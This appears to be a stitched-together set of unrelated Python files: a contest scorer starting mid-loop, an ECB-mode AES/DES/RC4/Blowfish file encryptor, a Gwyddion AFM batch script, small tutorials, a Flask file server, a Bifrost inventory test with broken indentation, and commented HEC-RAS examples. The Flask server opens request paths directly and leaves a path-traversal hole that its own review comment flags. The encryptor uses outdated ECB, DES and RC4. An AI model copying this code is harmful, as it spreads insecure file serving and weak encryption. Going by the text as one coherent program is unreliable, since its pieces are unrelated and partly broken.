    num, verdict = input().split()
    submissions.append((int(num), verdict))

solved = [False] * n          # has problem i received an AC yet
wrong_before_ac = [0] * n     # wrong answers before the first AC, per problem

for prob, verdict in submissions:
    if verdict == "AC":
        solved[prob - 1] = True
    elif not solved[prob - 1]:
        wrong_before_ac[prob - 1] += 1

ac = sum(solved)
psum = sum(w for w, ok in zip(wrong_before_ac, solved) if ok)
print(ac, psum)
#!/usr/bin/env python3
from Crypto.Cipher import AES
from Crypto.Cipher import DES
import hashlib
from Crypto.Cipher import ARC4
from Crypto.Cipher import Blowfish
class Aes():
    """Interactive AES-128-ECB file encryptor.

    Prompts for a 16-character key, reads `fil` as text, space-pads every
    line to the 16-byte AES block size and writes the hex ciphertext of each
    line (space-separated) to <name>_encrypted.<ext>.
    """
    def __init__(self,fil):
        # Loop until the user supplies a key of exactly 16 characters
        # (the AES-128 key size).
        while(True):
            self.key=input("ENTER THE KEY : ").strip()
            self.file=fil
            self.file_name=self.file.split("\\")[-1]
            self.file_name=self.file_name.split(".")
            self.file_name=self.file_name[0]+"_encrypted."+self.file_name[1]
            print(self.file_name)
            if(len(self.key)!=16):
                print("Key length should be 16")
            else:
                break
    def encrypt(self):
        """Encrypt the file line by line; returns the space-joined hex blocks."""
        # bug fix: pycryptodome requires a bytes key -- a str raises TypeError.
        # NOTE(review): ECB mode leaks plaintext patterns; acceptable only as a demo.
        self.crypt_AES=AES.new(self.key.encode(),AES.MODE_ECB)
        with open(self.file, "r") as fil:
            content = fil.readlines()
        # Space-pad each line up to a multiple of 16 characters
        # (assumes ASCII text so characters == bytes -- TODO confirm).
        content = [line + " " * (-len(line) % 16) for line in content]
        self.hex_content = [self.crypt_AES.encrypt(line.encode()).hex() for line in content]
        with open(self.file_name,"w") as fil:
            fil.write(" ".join(self.hex_content))
        return (" ".join(self.hex_content))
class Des():
    """Interactive DES-ECB file encryptor (8-byte key, 8-byte blocks)."""
    def __init__(self,fil):
        # bug fix: DES keys are exactly 8 bytes; the old "multiple of 8"
        # check accepted 16/24/... character keys that DES.new() rejects.
        while(True):
            self.key=input("ENTER THE KEY : ").strip()
            self.file=fil
            self.file_name=self.file.split("\\")[-1]
            self.file_name=self.file_name.split(".")
            self.file_name=self.file_name[0]+"_encrypted."+self.file_name[1]
            print(self.file_name)
            if(len(self.key)!=8):
                print("Key length should be 8")
            else:
                break
    def encrypt(self):
        """Encrypt the file line by line; returns the space-joined hex blocks."""
        # bug fix: pycryptodome needs a bytes key and bytes plaintext, not str.
        self.crypt_DES = DES.new(self.key.encode(), DES.MODE_ECB)
        with open(self.file, "r") as fil:
            content = fil.readlines()
        # Space-pad each line to the 8-byte DES block size (assumes ASCII text).
        content = [line + " " * (-len(line) % 8) for line in content]
        self.hex_content = [self.crypt_DES.encrypt(line.encode()).hex() for line in content]
        with open(self.file_name, "w") as fil:
            fil.write(" ".join(self.hex_content))
        return (" ".join(self.hex_content))
class RC4():
    """Interactive RC4 file encryptor (stream cipher)."""
    def __init__(self,fil):
        while(True):
            self.key=input("ENTER THE KEY : ").strip()
            self.file=fil
            self.file_name=self.file.split("\\")[-1]
            self.file_name=self.file_name.split(".")
            self.file_name=self.file_name[0]+"_encrypted."+self.file_name[1]
            print(self.file_name)
            # RC4 itself accepts keys of 5..256 bytes; the multiple-of-8 rule
            # is kept only for backward compatibility with the original UI.
            if(len(self.key)%8!=0):
                print("Key length should be multiple of 8")
            else:
                break
    def encrypt(self):
        """Encrypt the file line by line; returns the space-joined hex blocks."""
        # bug fix: ARC4.new requires a bytes key -- a str raises TypeError.
        self.crypt_RC4 = ARC4.new(self.key.encode())
        with open(self.file, "r") as fil:
            content = fil.readlines()
        # RC4 is a stream cipher and needs no padding; the space padding is
        # kept so the output layout matches the block-cipher classes.
        content = [line + " " * (-len(line) % 8) for line in content]
        self.hex_content = [self.crypt_RC4.encrypt(line.encode()).hex() for line in content]
        with open(self.file_name, "w") as fil:
            fil.write(" ".join(self.hex_content))
        return (" ".join(self.hex_content))
class BLOWFISH():
    """Interactive Blowfish-ECB file encryptor (8-byte blocks)."""
    def __init__(self,fil):
        # Blowfish accepts keys of 4..56 bytes; the multiple-of-8 rule is the
        # original UI's convention and is kept for compatibility.
        while(True):
            self.key=input("ENTER THE KEY : ").strip()
            self.file=fil
            self.file_name=self.file.split("\\")[-1]
            self.file_name=self.file_name.split(".")
            self.file_name=self.file_name[0]+"_encrypted."+self.file_name[1]
            print(self.file_name)
            if(len(self.key)%8!=0):
                print("Key length should be multiple of 8")
            else:
                break
    def encrypt(self):
        """Encrypt the file line by line; returns the space-joined hex blocks."""
        # bug fixes: pycryptodome's Blowfish.new() requires an explicit mode
        # argument, and the key must be bytes, not str.
        self.crypt_BLOWFISH = Blowfish.new(self.key.encode(), Blowfish.MODE_ECB)
        with open(self.file, "r") as fil:
            content = fil.readlines()
        # Space-pad each line to the 8-byte Blowfish block size.
        content = [line + " " * (-len(line) % 8) for line in content]
        self.hex_content = [self.crypt_BLOWFISH.encrypt(line.encode()).hex() for line in content]
        with open(self.file_name, "w") as fil:
            fil.write(" ".join(self.hex_content))
        return (" ".join(self.hex_content))
# Entry point: "E" to encrypt a file with a chosen cipher, "H" to hash it.
mode=input("ENTER HASH OR ENCRYPTION : ").strip()
if(mode=="E"):
    # Dispatch table: cipher name -> class exposing encrypt()
    # (replaces the old if/elif chain; `type` also shadowed the builtin).
    ciphers = {"AES": Aes, "DES": Des, "RC4": RC4, "BLOWFISH": BLOWFISH}
    while(True):
        choice = input("ENTER THE TYPE OF ENCRYPTION YOU WANT TO MAKE : ").strip()
        if choice in ciphers:
            fil = input("Enter the Name of the file : ")
            ciphers[choice](fil).encrypt()
            break
        print("Enter AES or DES or RC4 or BLOWFISH")
elif(mode=="H"):
    fil=input("Enter the name of the file").strip()
    h_type=input("Enter the hash type preffered : ")
    # All supported digests live in hashlib under their own names, so a
    # getattr lookup replaces the ten-branch elif chain; the file handle is
    # now closed (the old code leaked one per branch). Unknown hash names
    # print nothing, matching the original behaviour.
    supported = {"md5", "blake2s", "blake2b", "sha1", "sha256", "sha224",
                 "sha384", "sha3_384", "sha3_256", "sha3_224"}
    if h_type in supported:
        with open(fil, "rb") as handle:
            print(getattr(hashlib, h_type)(handle.read()).hexdigest())
else:
    print("input should be H or E")
import gwyutils, gwy, gc
from copy import deepcopy
from os import listdir, mkdir, getcwd
from os.path import isfile, join, isdir
import os, datetime
import re, shutil, imp
import sys  # bug fix: sys.path is used below but sys was never imported
import numpy as np

# Make the custom pygwy helper library importable, then (re)load it.
if not '/home/june/.gwyddion/pygwy/custlib' in sys.path:
    sys.path.append('/home/june/.gwyddion/pygwy/custlib')
import Fct_gwyfunctions as custgwy
imp.reload(custgwy)

# (low, high) cumulative-height fractions used when rescaling image colors.
ratio = (0.05, 0.99)
# PNG export destination and the raw AFM data tree to process.
pngexp = '/home/june/AFMImages'
cwd = '/home/june/RawAFMImages'
root = '/home/june/RawAFMImages'
def runbatch(root, cwd, pdr, pngexp, ratio):
    """Merge the AFM files in `cwd` into one Gwyddion container, clean each
    channel and export PNGs plus a processed .gwy file.

    root   -- top-level raw-data directory (its basename names the PNG folder)
    cwd    -- directory whose files are merged and processed
    pdr    -- suffix (parent directory name) for the saved .gwy file
    pngexp -- base directory receiving exported PNGs and meta_file.txt
    ratio  -- (low, high) cumulative-height fractions for the color range
    """
    print(cwd)
    # Export PNG with scalebar
    s = gwy.gwy_app_settings_get()
    s['/module/pixmap/title_type'] = 0
    s['/module/pixmap/ztype'] = 0
    s['/module/pixmap/xytype'] = 0
    s['/module/pixmap/draw_maskkey'] = False
    # ... (*lots* of possible settings, see ~/.gwyddion/settings)
    Files_To_Open = [ f for f in listdir(cwd) if isfile(join(cwd,f)) ]
    print(Files_To_Open)
    if len(Files_To_Open) == 0:
        return 'No files'
    try:
        mkdir(join(cwd,'Processed'))
    except Exception as sym:
        print ('Already Exist')
    Tobe_Saved = join(cwd, 'Processed')
    filename_save = cwd.split('/')[-1]
    print (Files_To_Open)
    #Load first file to use as Merged file
    # bug fix: iterate over a copy -- the old code removed items from the
    # list it was iterating, which silently skips the following entry.
    for filename in list(Files_To_Open):
        if not filename[-3:][-1].isdigit():
            Files_To_Open.remove(filename)
            continue
        print(filename)
        try:
            # bug fix: RUN_NONINTERACTIVE must be qualified with the gwy
            # module; the bare name raised NameError, which the except below
            # swallowed, so every file was rejected as "not proper".
            Temp = gwy.gwy_file_load(join(cwd,filename), gwy.RUN_NONINTERACTIVE)
            print(type(Temp))
            if type(Temp) == gwy.Container :
                print('right type')
                Cont_Dest = Temp
                Files_To_Open.remove(filename)
                Fstfilename = filename
                break
            Files_To_Open.remove(filename)
            print('loadedbutnot')
        except Exception as sym:
            print('except')
            print ("not proper file"+str(sym)+"\n")
            continue
    #Add into current browser and Make Visible on display
    try:
        gwy.gwy_app_data_browser_add(Cont_Dest)
    except Exception as ex:
        print(ex.args)
        return 'no veeco files to load'
    Cont_Dest.set_boolean_by_name('/0/data/visible', 1)
    print (Files_To_Open)
    #File Merge
    #First Container: drop Amplitude channels, tag titles with the filename.
    DataFields = gwyutils.get_data_fields_dir(Cont_Dest)
    for key in DataFields.keys():
        title = Cont_Dest.get_string_by_name(key+"/title")
        if (title == 'Amplitude') : Cont_Dest.remove_by_prefix('/'+key.split('/')[1]+'/')
        Cont_Dest.set_string_by_name(key+'/title', title+'.'+Fstfilename)
    #Rest of Containers: copy their Height channels into the merged container.
    print ('Rest of Files',Files_To_Open)
    for filename in list(Files_To_Open) :
        if not filename[-3:][-1].isdigit():
            Files_To_Open.remove(filename)
            continue
        try:
            # bug fix: gwy.RUN_NONINTERACTIVE (was an unqualified NameError)
            Temp_Source = gwy.gwy_file_load(join(cwd,filename), gwy.RUN_NONINTERACTIVE)
            if type(Temp_Source) == gwy.Container:
                Cont_Source = Temp_Source
                pass
            else:
                continue
        except Exception as sym:
            # bug fix: str(sym) -- concatenating str + Exception raised
            # TypeError inside the handler itself.
            print ("not proper file"+str(sym)+"\n")
            continue
        DataFields = gwyutils.get_data_fields_dir(Cont_Source)
        for key in DataFields.keys():
            ID = key.split('/')[1]
            title = Cont_Source.get_string_by_name(key+"/title")
            if (title == 'Height') :
                Cont_Source.set_string_by_name(key+'/title', title+'.'+filename)
                gwy.gwy_app_data_browser_copy_channel(Cont_Source, int(ID), Cont_Dest)
            print (key, title)
        try:
            # bug fix: the browser-remove call needs the gwy. prefix
            gwy.gwy_app_data_browser_remove(Cont_Source)
            del Cont_Source
            print (gc.collect())
        except Exception as ex:
            print (ex.args)
    try:
        mkdir(join(pngexp, root.split('/')[-1]))
    except :
        pass
    meta = open(join(pngexp, root.split('/')[-1])+'/'+'meta_file.txt' , 'a')
    #Change Palette, Flatten, Correct line, Remove Scars, Change Scale
    DataFields = gwyutils.get_data_fields_dir(Cont_Dest)
    for key in DataFields.keys():
        ID = key.split('/')[1]
        title = Cont_Dest.get_string_by_name(key+"/title")
        print (title+'\n')
        # Subtract polynomial background
        coeffs = DataFields[key].fit_polynom(3, 3)
        DataFields[key].subtract_polynom(3, 3, coeffs)
        DataFields[key].data_changed()
        #Get X Y scale (meters -> um, falling back to nm for sub-micron images)
        si = {'x' : 'um' , 'y' : 'um'}
        size_x = DataFields[key].get_xreal()*1000000
        if (size_x < 1.0):
            size_x = size_x * 1000
            si['x'] = 'nm'
        size_y = DataFields[key].get_yreal()*1000000
        if (size_y < 1.0):
            size_y = size_y * 1000
            si['y'] = 'nm'
        scale = str(size_x)+si['x']+'by'+str(size_y)+si['y']
        title = title + '_'+ scale
        # Line and scar correction (run module functions)
        gwy.gwy_app_data_browser_select_data_field(Cont_Dest, int(ID))
        gwy.gwy_process_func_run("line_correct_median", Cont_Dest, gwy.RUN_IMMEDIATE)
        gwy.gwy_process_func_run("scars_remove", Cont_Dest, gwy.RUN_IMMEDIATE)
        gwy.gwy_process_func_run("fix_zero", Cont_Dest, gwy.RUN_IMMEDIATE)
        #Get Color Type
        colorr = Cont_Dest.get_int32_by_name('/'+ID+'/base/range-type')
        #Change_Color Palette
        Cont_Dest.set_string_by_name('/'+ID+'/base/palette', 'Gold')
        #Get Height Distribution and get Percentile color set range
        #Get CDH
        histogram = gwy.DataLine(1, 1, False)
        DataFields[key].dh(histogram, 512)
        median = histogram.get_max()
        data = histogram.get_data()
        ind_med = [i for i,v in enumerate(data) if data[i] == median][0]
        #Get Percentile Range: walk the cumulative histogram outwards from the
        #mode until the low/high `ratio` fractions are crossed.
        cumhistogram = gwy.DataLine(1, 1, False)
        DataFields[key].cdh(cumhistogram, 512)
        data = cumhistogram.get_data()
        Data_Range = DataFields[key].get_min_max()
        Hist_pct = [0, 0]
        Hist_pct[0] = [float(index)/512 for index in range(ind_med, 0, -1) if (data[index] >= ratio[0] and data[index-1] <= ratio[0])][0]
        Hist_pct[1] = [float(index)/512 for index in range(ind_med, 512, 1) if (data[index] <= ratio[1] and data[index+1] >= ratio[1])][0]
        Range = Data_Range[1]-Data_Range[0]
        Color_Range = {'min': Data_Range[0]+Range*Hist_pct[0], 'max':Data_Range[0]+Range*Hist_pct[1]}
        Cont_Dest.set_boolean_by_name('/'+ID+'/data/visible', 1)
        Cont_Dest.set_int32_by_name('/'+ID+'/base/range-type' , 1)
        Cont_Dest.set_double_by_name('/'+ID+'/base/min', Color_Range['min'])
        Cont_Dest.set_double_by_name('/'+ID+'/base/max', Color_Range['max'])
        meta.write('Filename : '+ cwd+ '/' +str(title.split('Height.')[1])+'\n')
        meta.write('ColorRange : '+'{min : \t%e,\t max : \t%e }\n' %(Color_Range['min'] ,Color_Range['max']))
        #Change Color Range into (Full:0, Manual:1, Auto:2, Adaptive:3)
        #Cont_Dest.set_int32_by_name('/'+ID+'/base/range-type', 2)
        print (title)
        gwy.gwy_file_save(Cont_Dest, join(pngexp, root.split('/')[-1])+ '/' +str(title)+'%d.png' % int(ID), gwy.RUN_NONINTERACTIVE)
        Cont_Dest.set_boolean_by_name('/'+ID+'/data/visible', 0)
    try:
        gwy.gwy_file_save(Cont_Dest,join(cwd, 'Processed')+'/'+root.split('/')[-1]+pdr+'.gwy', gwy.RUN_NONINTERACTIVE)
    except Exception as ex:
        print(ex.args)
    # bug fix: gwy. prefix (the bare name raised NameError and crashed here)
    gwy.gwy_app_data_browser_remove(Cont_Dest)
    del Cont_Dest
    print (gc.collect())
    meta.close()
def scan_dir_runbatch(root, cwd, pdr, pngexp, ratio):
    """Depth-first walk: batch-process every subdirectory of `cwd` (skipping
    the 'Processed' output folder), then run the batch on `cwd` itself."""
    subdirs = [entry for entry in listdir(cwd) if isdir(join(cwd, entry))]
    if 'Processed' in subdirs:
        subdirs.remove('Processed')
    for subdir in subdirs:
        scan_dir_runbatch(root, join(cwd, subdir), subdir, pngexp, ratio)
    runbatch(root, cwd, pdr, pngexp, ratio)


##########Get list of sub directories and run recursive self function
#custgwy.sep_files(root, cwd, 'DDX - postexp')
scan_dir_runbatch(root, cwd, cwd.split('/')[-1], pngexp, ratio)
|
"""
Tuples: similar to lists, but tuple elements cannot be modified.
They avoid thread-safety problems in multithreaded code, and tuples beat
lists in both creation time and memory footprint.
"""
def main():
    # Define a tuple.
    yz = ('wangfeng', 22, '162cm', '四川省南部县')
    print(yz)
    # Access individual elements by index.
    print(yz[0])
    print(yz[1])
    # Iterate over the tuple.
    for x in yz:
        print(x)
    # Attempting to modify a tuple element raises TypeError:
    # yz[0] = 'bool' TypeError
    # Rebinding `yz` lets the original tuple be garbage-collected.
    yz = ('bool', 25, '162cm', '四川省南部县')
    print(yz)
    # Convert the tuple to a list...
    person = list(yz)
    # ...modify a list element...
    person[0] = 'wangfeng'
    print(person)
    # ...and convert the list back to a tuple.
    yz = tuple(person)
    print(yz)
if __name__ == '__main__':
    main()
|
# -*- coding: utf-8 -*-
"""
Faça um Programa que peça a temperatura em graus Celsius,
transforme e mostre em graus Farenheit.
"""
# Read a Celsius temperature and print its Fahrenheit equivalent.
temperatura_celsius = float(input("Informe a temperatura em Celsius: "))
fahrenheit = temperatura_celsius * 9 / 5 + 32
print(f"{temperatura_celsius}ºC equivalem a {fahrenheit}ºF")
|
import re
import sys
from flask import Flask, make_response
app = Flask(__name__)
# Pretty-print JSON responses produced via jsonify, for readability.
app.config['JSONIFY_PRETTYPRINT_REGULAR'] = True
# the default page that is displayed
# when url is not provided
@app.route('/')
def default():
    """Serve index.htm from the current directory as the landing page,
    or a 404 response when the file is missing."""
    try:
        with open('index.htm') as page:
            return make_response(page.read(), 200)
    except IOError:
        print ("Error: File does not appear to exist.")
        return make_response("that page does not exist", 404)
# catches all urls that are provided
@app.route('/<path:url>')
def getAll(url):
    """Serve any requested *.htm / *.html file; 400 for other paths,
    404 when the file does not exist."""
    # bug fix: the old pattern '^((\/.*)*.html)|((\/.*)*.htm)$' bound ^ to the
    # first alternative and $ to the second, and left the dots unescaped, so
    # e.g. '/x.htmlfoo' and '/xhtml' were accepted. fullmatch anchors both ends.
    if re.fullmatch(r'(/.*)*\.html?', '/' + url) is None:
        # The requested path is not an .htm/.html file.
        return make_response("bad request", 400)
    # NOTE(review): `url` is used directly as a filesystem path, so '../'
    # traversal outside the serving directory is possible -- confirm intent.
    try:
        with open(url) as page:
            return make_response(page.read(), 200)
    except IOError:
        # Valid-looking path, but no such file on disk.
        return make_response("that page does not exist", 404)
if __name__ == '__main__':
    # Port comes from the command line when given, defaulting to 8080.
    # bug fix: the old `len(sys.argv) > 1 and sys.argv[1] or 8080` idiom
    # passed the port through as a string; convert it to int explicitly.
    port = int(sys.argv[1]) if len(sys.argv) > 1 else 8080
    app.run(port=port)
# -*- coding: utf-8 -*-
# Copyright (c) 2015 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import yaml
from bifrost.tests import base
from bifrost.tests import utils
class TestBifrostInventoryFunctional(base.TestCase):
    def setUp(self):
        # Show full diffs on assertion failures -- the expected JSON blobs
        # compared below are large.
        self.maxDiff = None
        super(TestBifrostInventoryFunctional, self).setUp()
def test_yaml_to_json_conversion(self):
# Note(TheJulia) Ultimately this is just ensuring
# that we get the same output when we pass something
# in as YAML
expected_hostvars = """{"hostname1":
{"uuid": "00000000-0000-0000-0000-000000000002", "driver": "ipmi",
"name": "hostname1", "ipv4_address": "192.168.1.3", "ansible_ssh_host":
"192.168.1.3", "provisioning_ipv4_address": "192.168.1.3",
"driver_info": {"ipmi_address": "192.0.2.3",
"ipmi_password": "undefined", "ipmi_username": "root",
"ipmi_target_address": null, "ipmi_target_channel": null,
"ipmi_transit_address": null, "ipmi_transit_channel": null}, "nics":
[{"mac": "00:01:02:03:04:06"}], "properties": {"ram": "8192", "cpu_arch":
"x86_64", "disk_size": "1024", "cpus": "2"}, "host_groups":
["baremetal", "nova"]}, "hostname0":
{"uuid": "00000000-0000-0000-0000-000000000001", "driver": "ipmi",
"name": "hostname0", "ipv4_address": "192.168.1.2", "ansible_ssh_host":
"192.168.1.2", "provisioning_ipv4_address": "192.168.1.2",
"driver_info": {}, "nics":
[{"mac": "00:01:02:03:04:05"}], "properties": {"ram": "8192",
"cpu_arch": "x86_64", "disk_size": "512", "cpus": "1"},
"host_groups": ["baremetal", "nova"]}}""".replace('\n', '')
(groups, hostvars) = utils.bifrost_data_conversion(
yaml.safe_dump(json.loads(str(expected_hostvars))))
del hostvars['127.0.0.1']
self.assertDictEqual(json.loads(str(expected_hostvars)), hostvars)
def test_minimal_json(self):
input_json = """{"h0000-01":{"uuid":
"00000000-0000-0000-0001-bad00000010","name":"h0000-01","driver_info"
:{"ipmi_address":"10.0.0.78","ipmi_username":"ADMIN","
ipmi_password":"ADMIN"},"driver":"ipmi"}}""".replace('\n', '')
expected_json = """{"h0000-01":{"uuid":
"00000000-0000-0000-0001-bad00000010","name":"h0000-01","driver_info"
:{"ipmi_address":"10.0.0.78","ipmi_username":"ADMIN","
ipmi_password":"ADMIN"},"driver":"ipmi","addressing_mode":
"dhcp","host_groups": ["baremetal"]}}""".replace('\n', '')
(groups, hostvars) = utils.bifrost_data_conversion(input_json)
del hostvars['127.0.0.1']
self.assertDictEqual(json.loads(str(expected_json)), hostvars)
|
# -*- coding: utf-8 -*-
"""
"""
import datetime as dt
import time
from pyras.controllers import RAS500, RAS41, kill_ras
from pyras.controllers.hecras import ras_constants as RC
#project = r'temp_examples\Steady Examples\BEAVCREK.prj'
#project = r'temp_examples\Unsteady Examples\NavigationDam\ROCK_TEST.prj'
#project = r'D:\Users\penac1\Dropbox (Personal)\it\repos\git\pyras\temp\Unsteady Examples\BEAV_STO_PROBLEM.prj'
#project = r'D:\Users\penac1\Dropbox (Personal)\it\repos\git\pyras\temp_examples\Unsteady Examples\BaldLatWeir.prj'
#project = r'D:\Users\penac1\Dropbox (Personal)\it\repos\git\pyras\temp_examples\Steady Examples\BEAVCREK.prj'
#
##with RAS500(project) as rc:
## res = rc.Project_Current()
## print(rc.version())
## print('Project_Current:')
## print(res)
## print('')
## for m in sorted(dir(rc)):
## print(m)
## rc.pause(10)
#
#rc = RAS41()
#rc.ShowRas()
#rc.Project_Open(project)
#
# %% Curent (Controller Class)
#res = rc.CurrentGeomFile()
#print('CurrentGeomFile')
#print(res)
#print('')
#
#res = rc.CurrentPlanFile()
#print('CurrentPlanFile')
#print(res)
#print('')
#
#res = rc.CurrentProjectFile()
#print('CurrentProjectFile')
#print(res)
#print('')
#
#res = rc.CurrentProjectTitle()
#print('CurrentProjectTitle')
#print(res)
#print('')
#
#res = rc.CurrentSteadyFile()
#print('CurrentSteadyFile')
#print(res)
#print('')
#
#res = rc.CurrentUnSteadyFile()
#print('CurrentUnSteadyFile')
#print(res)
#print('')
# %% Geometry (Geometry Class)
#geo = rc.Geometry()
#
#res = geo.RiverIndex('Beaver Creek')
#print('RiverIndex')
#print(res)
#print('')
#
#res = geo.RiverName(1)
#print('RiverName')
#print(res)
#print('')
#
#res = geo.ReachName(1, 1)
#print('ReachName')
#print(res)
#print('')
#
#res = geo.ReachInvert_nPoints(1, 1)
#print('ReachInvert_nPoints')
#print(res)
#print('')
#
#res = geo.ReachInvert_Points(1, 1)
#print('ReachInvert_Points')
#print(res)
#print('')
#
#res = geo.ReachIndex(1, 'Kentwood')
#print('ReachIndex')
#print(res)
#print('')
#
#res = geo.nRiver()
#print('nRiver')
#print(res)
#print('')
#
#res = geo.nReach(1)
#print('nReach')
#print(res)
#print('')
#
#res = geo.NodeType(1, 1, 1)
#print('NodeType')
#print(res)
#print('')
#
#res = geo.NodeRS(1, 1, 1)
#print('NodeRS')
#print(res)
#print('')
#
#res = geo.NodeIndex(1, 1, '5.99')
#print('NodeIndex')
#print(res)
#print('')
#
#res = geo.NodeCutLine_Points(1, 1, 1)
#print('NodeCutLine_Points')
#print(res)
#print('')
#
#res = geo.NodeCutLine_nPoints(1, 1, 1)
#print('NodeCutLine_nPoints')
#print(res)
#print('')
#
#res = geo.NodeCType(1, 1, 8)
#print('NodeCType')
#print(res)
#print('')
#%% Edit Add (Controller Class)
#res = rc.Edit_AddBC('Beaver Creek', 'Kentwood', '5.691')
#print('Edit_AddBC')
#print(res)
#print('')
#
#res = rc.Edit_AddIW('Beaver Creek', 'Kentwood', '5.692')
#print('Edit_AddIW')
#print(res)
#print('')
#
#res = rc.Edit_AddLW('Beaver Creek', 'Kentwood', '5.693')
#print('Edit_AddLW')
#print(res)
#print('')
#
#res = rc.Edit_AddXS('Beaver Creek', 'Kentwood', '5.694')
#print('Edit_AddXS')
#print(res)
#print('')
# %% Edit (Controller Class)
#rc.Edit_BC('Beaver Creek', 'Kentwood', '5.99')
#print('Edit_BC')
#print('')
#
#rc.Edit_GeometricData()
#print('Edit_GeometricData')
#print('')
#
#rc.Edit_IW('Beaver Creek', 'Kentwood', '5.99')
#print('Edit_IW')
#print('')
#
#rc.Edit_LW('Beaver Creek', 'Kentwood', '5.99')
#print('Edit_LW')
#print('')
#
#rc.Edit_MultipleRun()
#print('Edit_MultipleRun')
#print('')
#
#rc.Edit_PlanData()
#print('Edit_PlanData')
#print('')
#
#rc.Edit_QuasiUnsteadyFlowData()
#print('Edit_QuasiUnsteadyFlowData')
#print('')
#
#rc.Edit_SedimentData()
#print('Edit_SedimentData')
#print('')
#
#rc.Edit_SteadyFlowData()
#print('Edit_SteadyFlowData')
#print('')
#
#rc.Edit_UnsteadyFlowData()
#print('Edit_UnsteadyFlowData')
#print('')
#
#rc.Edit_WaterQualityData()
#print('Edit_WaterQualityData')
#print('')
#
#rc.Edit_XS('Beaver Creek', 'Kentwood', '5.99')
#print('Edit_XS')
#print('')
# %% Geometry (Controller Class)
#res = rc.ExportGIS()
#print('ExportGIS')
#print(res)
#print('')
# Not tested
#res = rc.Geometery_GISImport(self, title, Filename)
#print('Geometery_GISImport')
#print(res)
#print('')
# Not tested but seems to work
#res = rc.Geometry_GetGateNames(1, 1, '5.39')
#print('Geometry_GetGateNames')
#print(res)
#print('')
# Not working
#res = rc.Geometry_GetGML('Bvr.Cr.+Bridge - P/W: New Le, Lc')
#print('Geometry_GetGML')
#print(res)
#print('')
#res = rc.Geometry_GetNode(1, 1, '5.39')
#print('Geometry_GetNode')
#print(res)
#print('')
#
#res = rc.Geometry_GetNodes(1, 1)
#print('Geometry_GetNodes')
#print(res)
#print('')
#
#res = rc.Geometry_GetReaches(1)
#print('Geometry_GetReaches')
#print(res)
#print('')
#
#res = rc.Geometry_GetRivers()
#print('Geometry_GetRivers')
#print(res)
#print('')
#
#res = rc.Geometry_SetMann('Beaver Creek', 'Kentwood', '5.99',
# 3, (0.12, 0.13, 0.14), (5, 36, 131))
#print('Geometry_SetMann')
#print(res)
#print('')
#
#res = rc.Geometry_SetMann_LChR('Beaver Creek', 'Kentwood', '5.99', 0.15, 0.10,
# 0.16)
#print('Geometry_SetMann_LChR')
#print(res)
#print('')
#
#res = rc.Geometry_SetSAArea('test', 1200)
#print('Geometry_SetSAArea')
#print(res)
#print('')
# %% Get (Controller Class)
#res = rc.GetRASVersion()
#print('GetRASVersion')
#print(res)
#print('')
#
#res = rc.HECRASVersion()
#print('HECRASVersion', res)
#print(res)
#print('')
# %% Output
#river = 1
#reach = 1
#n = 1
#station = '135068.7'
#res = rc.Output_ComputationLevel_Export('export_test2.txt')
#print('Output_ComputationLevel_Export', res)
#print('')
#
#res = rc.Output_GetNode(river, reach, station)
#print('Output_GetNode', res)
#print('')
#
#res = rc.Output_GetNodes(river, reach)
#print('Output_GetNodes', res)
#print('')
#res = rc.Output_GetProfiles()
#print('Output_GetProfiles', res)
#print('')
#reach = 'Loc Hav'
#res = rc.Output_GetReach(river, reach)
#print('Output_GetReach', res)
#print('')
#res = rc.Output_GetReaches(river)
#print('Output_GetReaches', res)
#print('')
#river_name = 'Bald Eagle'
#res = rc.Output_GetRiver(river_name)
#print('Output_GetRiver', res)
#print('')
#res = rc.Output_GetRivers()
#print('Output_GetRivers', res)
#print('')
#updn = 0
#prof = 1
#nVar = RC.WS_ELEVATION
#res = rc.Output_NodeOutput(river, reach, n, updn, prof, nVar)
#print('Output_NodeOutput', res)
#print('')
#riv_id = 1
#rch = 1
#prof = 1
#nVar = RC.PROFILE
#res = rc.Output_ReachOutput(riv_id, rch, prof, nVar)
#print('Output_ReachOutput', res)
#print('')
#res = rc.Output_Variables()
#print('Output_Variables', res)
#print('')
#riv = 1
#rch = 1
#n = 1
#updn = 1
#prof = 1
#res = rc.Output_VelDist(riv, rch, n, updn, prof)
#print('Output_Output_VelDist', res)
#print('')
#riv = 'Bald Eagle'
#rch = 'Loc Hav'
#rs = '138154.4'
#res = rc.OutputDSS_GetStageFlow(riv, rch, rs)
#print('OutputDSS_GetStageFlow', res)
#print('')
#res = rc.OutputDSS_GetStageFlowSA('Lower SA')
#print('OutputDSS_GetStageFlowSA', res)
#print('')
# %% Plan
#plan = 'Unsteady with Bridges, Dam, later weirs/'
#res = rc.Plan_GetFilename(plan)
#print('Plan_GetFilename', res)
#print('')
#res = rc.Plan_Names(False)
#print('Plan_Names', res)
#print('')
#res = rc.Plan_Reports()
#print('Plan_Reports', res)
#print('')
#plan = 'Unsteady with Bridges, Dam, later weirs/'
#res = rc.Plan_SetCurrent(plan)
#print('Plan_SetCurrent', res)
#print('')
#plan = 'Unsteady with Bridges, Dam, later weirs/'
#show_message = False
#res = rc.PlanOutput_IsCurrent(plan, show_message)
#print('PlanOutput_IsCurrent', res)
#print('')
#plan = 'Unsteady with Bridges, Dam, later weirs/'
#res = rc.PlanOutput_SetCurrent(plan)
#print('PlanOutput_SetCurrent', res)
#print('')
#plan = 'Unsteady with Bridges, Dam, later weirs/'
#res = rc.PlanOutput_SetMultiple(1, [plan], False)
#print('PlanOutput_SetMultiple', res)
#print('')
# %% Plot
# River/reach/station identifiers used by the commented-out plotting
# examples below (Bald Eagle Creek example project).
riv = 'Bald Eagle'
rch = 'Loc Hav'
rs = '138154.4'
sa = ' Upper SA'  # NOTE(review): leading space looks intentional (exact HEC-RAS storage-area name) - confirm
#rc.PlotHydraulicTables('Beaver Creek', 'Kentwood', '5.99')
#print('PlotHydraulicTables')
#print('')
#rc.PlotPF('Bald Eagle', 'Loc Hav')
#print('PlotPF')
#print('')
#rc.PlotPFGeneral('Bald Eagle', 'Loc Hav')
#print('PlotPFGeneral')
#print('')
#rc.PlotRatingCurve(riv, rch, rs)
#print('PlotRatingCurve')
#print('')
#rc.PlotStageFlow(riv, rch, rs)
